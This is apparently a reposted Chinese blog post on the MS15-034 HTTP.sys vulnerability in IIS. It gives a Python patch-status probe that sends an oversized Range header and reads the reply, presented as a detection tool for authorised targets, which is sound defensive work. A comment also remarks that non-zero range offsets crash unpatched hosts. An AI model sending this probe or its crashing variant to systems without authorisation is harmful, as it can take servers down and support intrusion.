远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
官方文档:https://technet.microsoft.com/zh-cn/library/security/MS15-034
POC（python2；以下脚本只是一个补丁状态检测脚本：先用一个普通请求确认目标是否为 IIS，再发送一次带超大 Range 头的请求并根据响应判断，不会尝试执行代码。请仅在获得授权的目标上运行）：
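#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Non-destructive MS15-034 (HTTP.sys) patch-status probe.

The check is two requests over a fresh TCP connection each:

1. a plain ``GET / HTTP/1.0`` to fingerprint the server -- anything without
   "Microsoft" in the reply is reported as "Not IIS" and skipped;
2. ``GET / HTTP/1.1`` with ``Range: bytes=0-18446744073709551615``.  A reply
   containing "Requested Range Not Satisfiable" is treated as unpatched, one
   rejecting the header as invalid is treated as patched, anything else is
   reported as undetermined.

NOTE(review): the probe deliberately starts the range at offset 0, which is
the detection form of the request; non-zero start offsets are reported to
crash unpatched hosts, so do not change it.  The fingerprint step relies on
the ``Server`` header being present -- a hardened IIS that strips it will be
reported as "Not IIS".  Use only against systems you are authorised to test.

Runs unchanged on Python 2.6+ and Python 3.  The target can be given on the
command line (``probe.py HOST [PORT]``); without arguments it is prompted
for, as the original script did.
"""
from __future__ import print_function

import socket
import sys
from contextlib import closing

try:
    _input = raw_input  # Python 2
except NameError:  # Python 3
    _input = input

DEFAULT_PORT = 80
# Without a timeout a firewalled or silently-dropping host hangs the probe forever.
DEFAULT_TIMEOUT = 10.0
# Upper bound on what we read back; only the status line / headers are inspected.
MAX_RESPONSE_BYTES = 8192

# 2**64 - 1 written in decimal: the range end that HTTP.sys mishandles.
UINT64_MAX_DECIMAL = "18446744073709551615"
REQ_FINGERPRINT = b"GET / HTTP/1.0\r\n\r\n"
REQ_PROBE = (
    "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + UINT64_MAX_DECIMAL + "\r\n\r\n"
).encode("ascii")


def _read_response(sock, limit=MAX_RESPONSE_BYTES):
    """Read from *sock* until the end of the HTTP headers, EOF, or *limit* bytes.

    Returns the raw bytes received.  A single ``recv(1024)`` can legitimately
    return less than the status line, so the read is looped.
    """
    buf = bytearray()
    while len(buf) < limit:
        chunk = sock.recv(min(1024, limit - len(buf)))
        if not chunk:
            break
        buf.extend(chunk)
        if b"\r\n\r\n" in buf:
            break
    return bytes(buf)


def _exchange(host, port, request, timeout):
    """Open a connection to *host*:*port*, send *request*, return the raw reply.

    Raises ``socket.error`` (``OSError`` on Python 3) on connection, timeout or
    I/O failure.  The socket is always closed, even on error.
    """
    with closing(socket.create_connection((host, port), timeout)) as sock:
        sock.sendall(request)
        return _read_response(sock)


def is_iis(banner):
    """Return True if the fingerprint reply looks like a Microsoft server."""
    return b"Microsoft" in banner


def classify_response(response):
    """Map the raw reply to the probe request to a verdict string.

    Pure function so the classification can be unit-tested without a network.
    """
    if b"Requested Range Not Satisfiable" in response:
        return "[!!] Looks VULN"
    if b" The request has an invalid header name" in response:
        return "[*] Looks Patched"
    return "[*] Unexpected response, cannot discern patch status"


def check_target(host, port=DEFAULT_PORT, timeout=DEFAULT_TIMEOUT):
    """Run the fingerprint and probe requests against *host*:*port*.

    Returns ``None`` when the target does not look like IIS, otherwise the
    verdict string from :func:`classify_response`.  Propagates ``socket.error``.
    """
    banner = _exchange(host, port, REQ_FINGERPRINT, timeout)
    if not is_iis(banner):
        return None
    return classify_response(_exchange(host, port, REQ_PROBE, timeout))


def main(argv=None):
    """Command-line entry point; returns the process exit code."""
    argv = sys.argv[1:] if argv is None else argv
    host = argv[0] if argv else _input("Please set your target:").strip()
    port = int(argv[1]) if len(argv) > 1 else DEFAULT_PORT

    print("[*] Audit Started")
    try:
        verdict = check_target(host, port)
    except socket.error as exc:  # covers gaierror and timeout on both Python versions
        print("[!] Connection failed: %s" % exc)
        return 1
    if verdict is None:
        print("[*] Not IIS")
        return 0
    print(verdict)
    return 0


if __name__ == "__main__":
    sys.exit(main())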
来源:oschina
链接:https://my.oschina.net/u/4381341/blog/3927592